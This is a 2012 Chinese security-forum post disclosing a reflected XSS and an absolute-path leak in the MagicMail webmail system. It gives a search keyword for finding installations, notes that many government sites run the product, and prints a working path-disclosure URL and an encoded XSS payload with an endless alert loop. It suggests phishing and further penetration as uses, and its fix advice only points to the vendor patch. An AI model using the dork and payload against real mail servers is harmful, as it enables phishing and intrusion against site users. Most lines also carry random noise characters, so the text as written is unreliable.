找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1916|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞: S# f' H; Z) T
5 P7 ~  T6 J1 ~! K
3 D" ?2 L( J& Q& `. m
包含  一个反射性XSS  以及  绝对路径泄漏
9 X' X- ]. a! ?9 _: ~看了看 貌似全部是linux的。
, I  |' K* ^( o0 b$ r- ~
: B' w0 y5 E: M- \: n$ l3 C关键字:迈捷邮件系统 by MagicMail$ F. s. z) i4 A) h
4 A$ L9 h1 B: U0 ^/ o; A5 i) q8 c+ w$ `
可以看到很多政府网站都用这个邮件系统# Q8 P) d  w4 h8 ~
3 o. `" R! V" P, a- y* U
绝对路径 http://madman.in/index.php?login_type=declare&language=2 _8 G2 W6 Y" j
" `+ Z. f; q2 k+ c0 i
) B' c& p  I1 ]$ }, o% u4 n: o

6 l3 [" X/ z; i  t9 I2 @0 [* kXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E" h" ?7 o  u5 ^
% S6 D) T5 W' R! l9 a
! [' c6 g  q$ Q  e( H
- V' e( n6 \7 @3 C/ S+ o
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等- Z5 ^4 K/ k7 S9 D# l" ]6 j

* |$ z  h+ {* Z修复方案:看官方补丁吧。0 n$ w  A' A' P9 P0 O" j) R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表